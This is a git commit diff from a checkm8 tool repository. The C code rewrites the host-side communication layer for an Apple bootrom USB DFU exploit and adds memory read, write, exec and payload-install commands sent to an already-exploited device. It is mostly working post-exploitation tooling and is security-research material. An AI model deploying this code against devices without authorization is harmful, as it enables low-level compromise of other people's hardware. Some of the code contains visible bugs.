grg/checkm8_tool
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

Much better communication model

Browse Source
This commit is contained in:
Gregor Haas
2019-12-15 18:32:34 -05:00
parent 450f4de756
commit 3972ac655e
9 changed files with 233 additions and 74 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
checkm8_payloads/bin/payload_aes.bin
View File

Binary file not shown.

BIN
checkm8_payloads/bin/payload_sysreg.bin
View File

Binary file not shown.

4
checkm8_payloads/src/sysreg.c
View File

@@ -7,11 +7,11 @@ struct sysregs
}; };
TEXT_SECTION TEXT_SECTION
struct sysregs _start() long long _start()
{ {
struct sysregs res; struct sysregs res;
__asm__("mrs %0, ttbr0_el1" : "=r" (res.pt_base)); __asm__("mrs %0, ttbr0_el1" : "=r" (res.pt_base));
__asm__("mrs %0, vbar_el1" : "=r" (res.evt_base)); __asm__("mrs %0, vbar_el1" : "=r" (res.evt_base));
return res; return res.evt_base;
} }

1
checkm8_remote/include/checkm8.h
View File

@@ -17,6 +17,7 @@
#define DEV_IDVENDOR 0x05AC #define DEV_IDVENDOR 0x05AC
#define DEV_IDPRODUCT 0x1227 #define DEV_IDPRODUCT 0x1227
#define DFU_IMAGE_BASE 0x1800B0000
#else #else
#error "Unspported checkm8 platform" #error "Unspported checkm8 platform"

22
checkm8_remote/include/command.h
View File

@@ -3,11 +3,23 @@
#include "checkm8.h" #include "checkm8.h"
int dev_memset(struct pwned_device *dev, long addr, unsigned char c, int len); #define CMD_USB_READ_LIMIT 0xFF0
int dev_memcpy(struct pwned_device *dev, long dest, long src, int len);
int dev_exec(struct pwned_device *dev, int response_len, int nargs, unsigned long long *args);
int dev_read_memory(struct pwned_device *dev, long addr, long len); struct dev_cmd_resp
int dev_write_memory(); {
int ret;
unsigned long long magic;
unsigned char *data;
int len;
};
struct dev_cmd_resp *dev_memset(struct pwned_device *dev, long long addr, unsigned char c, int len);
struct dev_cmd_resp *dev_memcpy(struct pwned_device *dev, long long dest, long long src, int len);
struct dev_cmd_resp *dev_exec(struct pwned_device *dev, int response_len, int nargs, unsigned long long *args);
struct dev_cmd_resp *dev_read_memory(struct pwned_device *dev, long long addr, int len);
struct dev_cmd_resp *dev_write_memory(struct pwned_device *dev, long long addr, unsigned char *data, int len);
void free_dev_cmd_resp(struct dev_cmd_resp *resp);
#endif //IPWNDFU_REWRITE_C_COMMAND_H #endif //IPWNDFU_REWRITE_C_COMMAND_H

7
checkm8_remote/include/payload.h
View File

@@ -6,6 +6,7 @@
#define PAYLOAD_AES_BIN CHECKM8_BIN_BASE "payloads/payload_aes.bin" #define PAYLOAD_AES_BIN CHECKM8_BIN_BASE "payloads/payload_aes.bin"
#define PAYLOAD_SYSREG_BIN CHECKM8_BIN_BASE "payloads/payload_sysreg.bin" #define PAYLOAD_SYSREG_BIN CHECKM8_BIN_BASE "payloads/payload_sysreg.bin"
#define PAYLOAD_SYNC_BIN CHECKM8_BIN_BASE "payloads/payload_sync.bin" #define PAYLOAD_SYNC_BIN CHECKM8_BIN_BASE "payloads/payload_sync.bin"
typedef enum typedef enum
{ {
PAYLOAD_SYNC, PAYLOAD_SYNC,
@@ -19,9 +20,13 @@ typedef enum
DRAM DRAM
} LOCATION_T; } LOCATION_T;
#define RESP_VALUE(buf, type, i) ((type *) buf)[i]
int install_payload(struct pwned_device *dev, PAYLOAD_T p, LOCATION_T loc); int install_payload(struct pwned_device *dev, PAYLOAD_T p, LOCATION_T loc);
int uninstall_payload(struct pwned_device *dev, PAYLOAD_T p); int uninstall_payload(struct pwned_device *dev, PAYLOAD_T p);
int execute_payload(struct pwned_device *dev, PAYLOAD_T p, int nargs, ...); struct dev_cmd_resp *execute_payload(struct pwned_device *dev, PAYLOAD_T p, int nargs, ...);
struct dev_cmd_resp *read_payload(struct pwned_device *dev, long long addr, int len);
struct dev_cmd_resp *write_payload(struct pwned_device *dev, long long addr, unsigned char *data, int len);
#endif //IPWNDFU_REWRITE_C_PAYLOAD_H #endif //IPWNDFU_REWRITE_C_PAYLOAD_H

21
checkm8_remote/main.c
View File

@@ -4,6 +4,7 @@
#include <stdio.h> #include <stdio.h>
#include <stdarg.h> #include <stdarg.h>
#include <execinfo.h> #include <execinfo.h>
#include <command.h>
void checkm8_debug_indent(const char *format, ...) void checkm8_debug_indent(const char *format, ...)
{ {
@@ -36,6 +37,7 @@ void checkm8_debug_block(const char *format, ...)
int main() int main()
{ {
int ret;
struct pwned_device *dev = exploit_device(); struct pwned_device *dev = exploit_device();
if(dev == NULL || dev->status == DEV_NORMAL) if(dev == NULL || dev->status == DEV_NORMAL)
{ {
@@ -43,9 +45,24 @@ int main()
return -1; return -1;
} }
struct dev_cmd_resp *resp;
install_payload(dev, PAYLOAD_SYNC, DRAM); install_payload(dev, PAYLOAD_SYNC, DRAM);
install_payload(dev, PAYLOAD_SYSREG, DRAM); install_payload(dev, PAYLOAD_SYSREG, DRAM);
execute_payload(dev, PAYLOAD_SYNC, 0); resp = execute_payload(dev, PAYLOAD_SYNC, 0);
execute_payload(dev, PAYLOAD_SYSREG, 0); printf("payload sync execution got ret %i\n", resp->ret);
free_dev_cmd_resp(resp);
resp = execute_payload(dev, PAYLOAD_SYSREG, 0);
if(resp->ret == CHECKM8_SUCCESS)
{
long long evt_base = RESP_VALUE(resp->data, unsigned long long, 0);
printf("got evt base %llx\n", evt_base);
resp = read_payload(dev, evt_base, 16);
printf("%08llX %08llx %08llx",
RESP_VALUE(resp->data, unsigned long long, 0),
RESP_VALUE(resp->data, unsigned long long, 1));
}
} }

178
checkm8_remote/src/command.c
View File

@@ -4,12 +4,19 @@
#include "libusb_helpers.h" #include "libusb_helpers.h"
#include "libusb.h" #include "libusb.h"
#include "stdlib.h" #include <stdlib.h>
#include <string.h>
void free_dev_cmd_resp(struct dev_cmd_resp *resp)
{
if(resp->data != NULL) free(resp->data);
free(resp);
}
int dfu_send_data(struct pwned_device *dev, unsigned char *data, long data_len) int dfu_send_data(struct pwned_device *dev, unsigned char *data, long data_len)
{ {
checkm8_debug_indent("dfu_send_data(dev = %p, data = %p, data_len = %li)\n", dev, data, data_len); checkm8_debug_indent("dfu_send_data(dev = %p, data = %p, data_len = %li)\n", dev, data, data_len);
long index = 0, amount; long long index = 0, amount;
int ret; int ret;
while(index < data_len) while(index < data_len)
@@ -31,24 +38,36 @@ int dfu_send_data(struct pwned_device *dev, unsigned char *data, long data_len)
static unsigned char nullbuf[16] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}; static unsigned char nullbuf[16] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0};
int command(struct pwned_device *dev, struct dev_cmd_resp *command(struct pwned_device *dev,
unsigned char *args, int arg_len, unsigned char *args, int arg_len, int response_len)
unsigned char *resp, int response_len)
{ {
checkm8_debug_indent("command(dev = %p, args = %p, arg_len = %i resp = %p, response_len = %i)\n", checkm8_debug_indent("command(dev = %p, args = %p, arg_len = %i, response_len = %i)\n",
dev, args, arg_len, resp, response_len); dev, args, arg_len, response_len);
if(!is_device_bundle_open(dev)) return CHECKM8_FAIL_NODEV;
struct dev_cmd_resp *cmd_resp = calloc(1, sizeof(struct dev_cmd_resp));
unsigned char resp_buf[response_len];
if(!is_device_bundle_open(dev))
{
cmd_resp->ret = CHECKM8_FAIL_NODEV;
return cmd_resp;
}
int ret; int ret;
ret = dfu_send_data(dev, nullbuf, 16); ret = dfu_send_data(dev, nullbuf, 16);
if(IS_CHECKM8_FAIL(ret)) return ret; if(IS_CHECKM8_FAIL(ret))
{
cmd_resp->ret = ret;
return cmd_resp;
}
ret = libusb_control_transfer(dev->bundle->handle, 0x21, 1, 0, 0, nullbuf, 0, 100); ret = libusb_control_transfer(dev->bundle->handle, 0x21, 1, 0, 0, nullbuf, 0, 100);
if(ret >= 0) checkm8_debug_indent("\ttransferred %i bytes\n", ret); if(ret >= 0) checkm8_debug_indent("\ttransferred %i bytes\n", ret);
else else
{ {
checkm8_debug_indent("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret)); checkm8_debug_indent("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret));
return CHECKM8_FAIL_XFER; cmd_resp->ret = ret;
return cmd_resp;
} }
ret = libusb_control_transfer(dev->bundle->handle, 0xA1, 3, 0, 0, nullbuf, 6, 100); ret = libusb_control_transfer(dev->bundle->handle, 0xA1, 3, 0, 0, nullbuf, 6, 100);
@@ -56,7 +75,8 @@ int command(struct pwned_device *dev,
else else
{ {
checkm8_debug_indent("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret)); checkm8_debug_indent("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret));
return CHECKM8_FAIL_XFER; cmd_resp->ret = ret;
return cmd_resp;
} }
ret = libusb_control_transfer(dev->bundle->handle, 0xA1, 3, 0, 0, nullbuf, 6, 100); ret = libusb_control_transfer(dev->bundle->handle, 0xA1, 3, 0, 0, nullbuf, 6, 100);
@@ -64,40 +84,57 @@ int command(struct pwned_device *dev,
else else
{ {
checkm8_debug_indent("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret)); checkm8_debug_indent("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret));
return CHECKM8_FAIL_XFER; cmd_resp->ret = ret;
return cmd_resp;
} }
ret = dfu_send_data(dev, args, arg_len); ret = dfu_send_data(dev, args, arg_len);
if(IS_CHECKM8_FAIL(ret)) return ret; if(IS_CHECKM8_FAIL(ret))
{
cmd_resp->ret = ret;
return cmd_resp;
}
if(response_len == 0) if(response_len == 0)
{ {
ret = libusb_control_transfer(dev->bundle->handle, ret = libusb_control_transfer(dev->bundle->handle,
0xA1, 2, 0xFFFF, 0, 0xA1, 2, 0xFFFF, 0,
resp, response_len + 1, resp_buf, response_len + 1,
100); 100);
if(ret >= 0) checkm8_debug_indent("\tfinal request transferred %i bytes\n", ret); if(ret >= 0) checkm8_debug_indent("\tfinal request transferred %i bytes\n", ret);
else else
{ {
checkm8_debug_indent("\tfinal request failed with error code %i (%s)\n", ret, libusb_error_name(ret)); checkm8_debug_indent("\tfinal request failed with error code %i (%s)\n", ret, libusb_error_name(ret));
return CHECKM8_FAIL_XFER; cmd_resp->ret = ret;
return cmd_resp;
} }
} }
else else
{ {
ret = libusb_control_transfer(dev->bundle->handle, ret = libusb_control_transfer(dev->bundle->handle,
0xA1, 2, 0xFFFF, 0, 0xA1, 2, 0xFFFF, 0,
resp, response_len, resp_buf, response_len,
100); 100);
if(ret >= 0) checkm8_debug_indent("\tfinal request transferred %i bytes\n", ret); if(ret >= 0) checkm8_debug_indent("\tfinal request transferred %i bytes\n", ret);
else else
{ {
checkm8_debug_indent("\tfinal request failed with error code %i (%s)\n", ret, libusb_error_name(ret)); checkm8_debug_indent("\tfinal request failed with error code %i (%s)\n", ret, libusb_error_name(ret));
return CHECKM8_FAIL_XFER; cmd_resp->ret = ret;
return cmd_resp;
} }
} }
return CHECKM8_SUCCESS; cmd_resp->ret = CHECKM8_SUCCESS;
memcpy(&cmd_resp->magic, resp_buf, 8);
if(response_len - 8 > 0)
{
checkm8_debug_indent("\tcopying %i bytes of output to response data section\n", response_len - 8);
cmd_resp->data = calloc(1, response_len - 8);
memcpy(cmd_resp->data, &resp_buf[8], response_len - 8);
}
cmd_resp->len = response_len - 8;
return cmd_resp;
} }
#define EXEC_MAGIC 0x6578656365786563ul // 'execexec'[::-1] #define EXEC_MAGIC 0x6578656365786563ul // 'execexec'[::-1]
@@ -105,7 +142,7 @@ int command(struct pwned_device *dev,
#define MEMS_MAGIC 0x6d656d736d656d73ul // 'memsmems'[::-1] #define MEMS_MAGIC 0x6d656d736d656d73ul // 'memsmems'[::-1]
#define DONE_MAGIC 0x646f6e65646f6e65ul // 'donedone'[::-1] #define DONE_MAGIC 0x646f6e65646f6e65ul // 'donedone'[::-1]
int dev_memset(struct pwned_device *dev, long addr, unsigned char c, int len) struct dev_cmd_resp *dev_memset(struct pwned_device *dev, long long addr, unsigned char c, int len)
{ {
checkm8_debug_indent("dev_memset(dev = %p, addr = %lx, c = %x, len = %li)\n", dev, addr, c, len); checkm8_debug_indent("dev_memset(dev = %p, addr = %lx, c = %x, len = %li)\n", dev, addr, c, len);
unsigned long long cmd_args[5]; unsigned long long cmd_args[5];
@@ -115,13 +152,10 @@ int dev_memset(struct pwned_device *dev, long addr, unsigned char c, int len)
cmd_args[3] = (unsigned long long) c; cmd_args[3] = (unsigned long long) c;
cmd_args[4] = len; cmd_args[4] = len;
unsigned long long cmd_resp; return command(dev, (unsigned char *) &cmd_args, 5 * sizeof(unsigned long long), 1 * sizeof(unsigned long long));
return command(dev,
(unsigned char *) &cmd_args, 5 * sizeof(unsigned long long),
(unsigned char *) &cmd_resp, 1 * sizeof(unsigned long long));
} }
int dev_memcpy(struct pwned_device *dev, long dest, long src, int len) struct dev_cmd_resp *dev_memcpy(struct pwned_device *dev, long long dest, long long src, int len)
{ {
checkm8_debug_indent("dev_memset(dev = %p, dest = %lx, src = %lx, len = %li)\n", dev, dest, src, len); checkm8_debug_indent("dev_memset(dev = %p, dest = %lx, src = %lx, len = %li)\n", dev, dest, src, len);
unsigned long long cmd_args[5]; unsigned long long cmd_args[5];
@@ -131,28 +165,17 @@ int dev_memcpy(struct pwned_device *dev, long dest, long src, int len)
cmd_args[3] = src; cmd_args[3] = src;
cmd_args[4] = len; cmd_args[4] = len;
unsigned long long cmd_resp; return command(dev, (unsigned char *) &cmd_args, 5 * sizeof(unsigned long long), 1 * sizeof(unsigned long long));
return command(dev,
(unsigned char *) &cmd_args, 5 * sizeof(unsigned long long),
(unsigned char *) &cmd_resp, 1 * sizeof(unsigned long long));
} }
int dev_exec(struct pwned_device *dev, int response_len, int nargs, unsigned long long *args) struct dev_cmd_resp *dev_exec(struct pwned_device *dev, int response_len, int nargs, unsigned long long *args)
{ {
checkm8_debug_indent("dev_exec(dev = %p, response_len = %lu, nargs = %i, args = %p\n", dev, response_len, nargs, checkm8_debug_indent("dev_exec(dev = %p, response_len = %lu, nargs = %i, args = %p\n", dev, response_len, nargs, args);
args);
if(nargs > 7)
{
checkm8_debug_indent("\ttoo many args\n");
return CHECKM8_FAIL_INVARGS;
}
int ret, i; int i;
unsigned long long *argbase; unsigned long long *argbase;
checkm8_debug_indent("\tcopying args\n");
unsigned long long cmd_args[1 + nargs]; unsigned long long cmd_args[1 + nargs];
unsigned long long cmd_resp[1 + response_len]; checkm8_debug_indent("\tcopying args\n");
cmd_args[0] = EXEC_MAGIC; cmd_args[0] = EXEC_MAGIC;
cmd_args[1] = 0; cmd_args[1] = 0;
@@ -163,14 +186,69 @@ int dev_exec(struct pwned_device *dev, int response_len, int nargs, unsigned lon
checkm8_debug_indent("\t\t0x%lx (0d%li) (%s)\n", args[i], args[i], (char *) &args[i]); checkm8_debug_indent("\t\t0x%lx (0d%li) (%s)\n", args[i], args[i], (char *) &args[i]);
} }
ret = command(dev, return command(dev, (unsigned char *) cmd_args, (1 + nargs) * sizeof(unsigned long long), 16 + response_len);
(unsigned char *) cmd_args, (1 + nargs) * sizeof(unsigned long long), }
(unsigned char *) cmd_resp, 16 + 8 * response_len);
struct dev_cmd_resp *dev_read_memory(struct pwned_device *dev, long long addr, int len)
if(ret == CHECKM8_SUCCESS && ((unsigned long *) cmd_resp)[0] != DONE_MAGIC) return CHECKM8_FAIL_NOTDONE; {
else checkm8_debug_indent("dev_read_memory(dev = %p, addr = %lx, len = %i)\n", dev, addr, len);
{ long long index = 0, amount;
checkm8_debug_indent("\tgot retval %lX\n", cmd_resp[1]);
return ret; unsigned long long cmd_args[5];
} struct dev_cmd_resp *resp, *ret = calloc(1, sizeof(struct dev_cmd_resp));
ret->data = calloc(1, len);
while(index < len)
{
if(len - index >= CMD_USB_READ_LIMIT - 16) amount = CMD_USB_READ_LIMIT - 16;
else amount = len - index;
checkm8_debug_indent("\treading chunk of size %li at index %li\n", amount, index);
cmd_args[0] = MEMC_MAGIC;
cmd_args[1] = 0;
cmd_args[2] = DFU_IMAGE_BASE + 16;
cmd_args[3] = addr + index;
cmd_args[4] = amount;
resp = command(dev, (unsigned char *) &cmd_args, 5 * sizeof(unsigned long long), 16 + amount);
ret->ret = resp->ret;
if(IS_CHECKM8_FAIL(resp->ret))
{
checkm8_debug_indent("\tlast transfer failed, aborting\n");
free_dev_cmd_resp(resp);
free(ret->data);
ret->data = NULL;
return ret;
}
else
{
checkm8_debug_indent("\tsuccessfully copied chunk\n");
memcpy(&ret->data[index], &resp->data[8], amount);
free_dev_cmd_resp(resp);
}
index += amount;
}
ret->magic = DONE_MAGIC;
ret->len = len;
return ret;
}
struct dev_cmd_resp *dev_write_memory(struct pwned_device *dev, long long addr, unsigned char *data, int len)
{
checkm8_debug_indent("dev_write_memory(dev = %p, addr = %lx, data = %p, len = %i)\n", dev, addr, data, len);
unsigned char cmd_args[40 + len];
((unsigned long *) cmd_args)[0] = MEMC_MAGIC;
((unsigned long *) cmd_args)[1] = 0;
((unsigned long *) cmd_args)[2] = addr;
((unsigned long *) cmd_args)[3] = DFU_IMAGE_BASE + 40;
((unsigned long *) cmd_args)[4] = len;
memcpy(&cmd_args[40], data, len);
return command(dev, (unsigned char *) &cmd_args, 40 + len, 1 * sizeof(unsigned long long));
return dev_memcpy(dev, addr, DFU_IMAGE_BASE + 40, len);
} }

78
checkm8_remote/src/payload.c
View File

@@ -12,7 +12,7 @@ struct payload
{ {
PAYLOAD_T type; PAYLOAD_T type;
unsigned char *data; unsigned char *data;
long len; int len;
long long install_base; long long install_base;
struct payload *next; struct payload *next;
@@ -76,6 +76,7 @@ void free_payload(struct payload *p)
long long curr_address = 0x180150000; long long curr_address = 0x180150000;
long long get_address(struct pwned_device *dev, LOCATION_T l) long long get_address(struct pwned_device *dev, LOCATION_T l)
{ {
//TODO: make an actual memory allocator
long long ret = curr_address; long long ret = curr_address;
curr_address += 0x1000; curr_address += 0x1000;
return ret; return ret;
@@ -131,6 +132,7 @@ int install_payload(struct pwned_device *dev, PAYLOAD_T p, LOCATION_T loc)
{ {
checkm8_debug_indent("install_payload(dev = %p, p = %i, loc = %i)\n", dev, p, loc); checkm8_debug_indent("install_payload(dev = %p, p = %i, loc = %i)\n", dev, p, loc);
int i, ret; int i, ret;
struct dev_cmd_resp *resp = NULL;
struct payload *pl = get_payload(p); struct payload *pl = get_payload(p);
long long addr = get_address(dev, loc); long long addr = get_address(dev, loc);
@@ -139,42 +141,50 @@ int install_payload(struct pwned_device *dev, PAYLOAD_T p, LOCATION_T loc)
ret = get_device_bundle(dev); ret = get_device_bundle(dev);
if(IS_CHECKM8_FAIL(ret)) return ret; if(IS_CHECKM8_FAIL(ret)) return ret;
for(i = 0; i < pl->len; i++) resp = dev_write_memory(dev, addr, pl->data, pl->len);
if(IS_CHECKM8_FAIL(resp->ret))
{ {
checkm8_debug_indent("\tcopying payload byte %i of %i\n", i, pl->len); free_dev_cmd_resp(resp);
ret = dev_memset(dev, addr + i, pl->data[i], 1); release_device_bundle(dev);
if(IS_CHECKM8_FAIL(ret)) return CHECKM8_FAIL_XFER;
{
release_device_bundle(dev);
return CHECKM8_FAIL_XFER;
}
} }
checkm8_debug_indent("\tdone copying and linking payload"); checkm8_debug_indent("\tdone copying and linking payload\n");
pl->install_base = addr; pl->install_base = addr;
dev_link_payload(dev, pl); dev_link_payload(dev, pl);
free_dev_cmd_resp(resp);
release_device_bundle(dev); release_device_bundle(dev);
return ret; return ret;
} }
int uninstall_payload(struct pwned_device *dev, PAYLOAD_T p) int uninstall_payload(struct pwned_device *dev, PAYLOAD_T p)
{ {
//TODO: free memory in memory allocator
} }
int execute_payload(struct pwned_device *dev, PAYLOAD_T p, int nargs, ...) struct dev_cmd_resp *execute_payload(struct pwned_device *dev, PAYLOAD_T p, int nargs, ...)
{ {
checkm8_debug_indent("execute_payload(dev = %p, p = %i, nargs = %i, ...)\n", dev, p, nargs); checkm8_debug_indent("execute_payload(dev = %p, p = %i, nargs = %i, ...)\n", dev, p, nargs);
int ret, i; int ret, i;
struct dev_cmd_resp *resp;
struct payload *pl; struct payload *pl;
if((pl = dev_retrieve_payload(dev, p)) == NULL) if((pl = dev_retrieve_payload(dev, p)) == NULL)
{ {
checkm8_debug_indent("\tpayload is not installed\n"); checkm8_debug_indent("\tpayload is not installed\n");
return CHECKM8_FAIL_NOINST; resp = calloc(1, sizeof(struct dev_cmd_resp));
resp->ret = CHECKM8_FAIL_NOINST;
return resp;
} }
ret = get_device_bundle(dev); ret = get_device_bundle(dev);
if(IS_CHECKM8_FAIL(ret)) return ret; if(IS_CHECKM8_FAIL(ret))
{
resp = calloc(1, sizeof(struct dev_cmd_resp));
resp->ret = ret;
return resp;
}
unsigned long long args[nargs + 1]; unsigned long long args[nargs + 1];
args[0] = pl->install_base; args[0] = pl->install_base;
@@ -189,7 +199,43 @@ int execute_payload(struct pwned_device *dev, PAYLOAD_T p, int nargs, ...)
} }
va_end(arg_list); va_end(arg_list);
ret = dev_exec(dev, 2, nargs + 1, args); resp = dev_exec(dev, 8, nargs + 1, args);
release_device_bundle(dev); release_device_bundle(dev);
return ret; return resp;
}
struct dev_cmd_resp *read_payload(struct pwned_device *dev, long long addr, int len)
{
int ret;
struct dev_cmd_resp *resp;
ret = get_device_bundle(dev);
if(IS_CHECKM8_FAIL(ret))
{
resp = calloc(1, sizeof(struct dev_cmd_resp));
resp->ret = ret;
return resp;
}
resp = dev_read_memory(dev, addr, len);
release_device_bundle(dev);
return resp;
}
struct dev_cmd_resp *write_payload(struct pwned_device *dev, long long addr, unsigned char *data, int len)
{
int ret;
struct dev_cmd_resp *resp;
ret = get_device_bundle(dev);
if(IS_CHECKM8_FAIL(ret))
{
resp = calloc(1, sizeof(struct dev_cmd_resp));
resp->ret = ret;
return resp;
}
resp = dev_write_memory(dev, addr, data, len);
release_device_bundle(dev);
return resp;
} }